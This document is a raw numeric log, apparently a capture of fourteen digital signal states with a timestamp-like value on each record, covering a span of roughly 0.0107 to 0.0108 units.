1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688348e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688452e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688476e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688552e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688576e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688724e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688776e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688924e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0688952e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0688976e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689004e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689024e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689076e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689100e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689152e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689176e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689224e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689252e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689376e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689404e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689424e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689524e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689552e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0689952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0689976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690524e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690552e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0690952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0690976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691176e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691228e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691252e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691324e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691352e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691376e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691404e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691776e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691804e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691924e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0691952e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0691976e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692004e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692076e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692100e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692152e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692176e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692228e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692252e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692324e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0692352e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0692376e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,1.0692404e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,1.0816276e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,1.0816488e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0816508e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,1.0816528e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0816556e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.0816852e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0816880e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.0816904e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0816924e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.0816952e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0816976e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.0817004e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0817028e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.0817052e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.0817076e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817108e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817128e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817152e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0817156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817160e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0817176e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.0817204e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817208e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817252e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817276e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817300e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817324e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817352e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817376e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817404e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817428e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817452e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817476e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817500e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817524e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817532e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0817552e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817576e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0817628e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817652e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.0817656e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817660e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817676e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817700e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817724e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817752e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817776e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817804e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0817828e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817852e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817860e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0817900e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817924e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0817952e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0817976e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0817980e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818004e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818028e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818052e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818076e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818100e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818124e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818152e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818176e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818204e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818228e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818276e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818300e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818308e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818324e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818352e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818376e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818404e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818428e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818452e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818476e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818500e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818524e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818552e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818576e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818604e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818628e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818652e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0818676e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818700e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818708e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818724e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818752e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818804e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818828e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818852e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818876e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818900e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818924e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0818952e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0818976e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0818980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0818984e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819028e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819052e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819076e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819100e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819124e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819152e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819176e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819204e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819228e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819252e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819300e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819324e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0819332e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0819380e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0819404e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0819408e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819412e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819428e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819452e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819476e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819500e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819524e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819552e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819576e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819604e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819628e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819652e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819676e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819700e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819724e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819752e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819776e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819804e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819828e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819852e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819876e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819900e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819924e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0819952e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0819976e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820004e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820028e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820052e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820076e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820100e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820124e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820152e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820176e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0820204e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0820252e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0820276e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820284e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820300e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820324e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820352e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820372e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820404e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820428e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820452e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820476e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820500e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820524e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820552e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820572e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820604e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820628e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820652e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820676e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.0820680e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0820684e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0820700e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0820724e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0820772e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0820804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820808e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820828e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820852e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820876e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820900e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820924e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0820952e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0820972e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821004e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0821028e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821052e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0821076e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821100e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0821152e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821172e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0821204e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821228e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0821252e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821276e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821284e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821300e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821324e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821352e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821372e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821404e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821428e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821452e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821476e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821500e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821524e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821552e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821572e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821604e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821628e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821652e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821676e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.0821680e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821684e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0821728e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0821752e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.0821756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821760e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821772e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821804e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821828e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821852e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821876e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821900e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821924e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0821952e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0821972e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822004e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.0822028e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.0822052e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822056e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0822076e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822100e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0822124e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822152e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0822172e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822204e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0822228e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822252e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0822276e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822300e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.0822352e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.0822372e-02 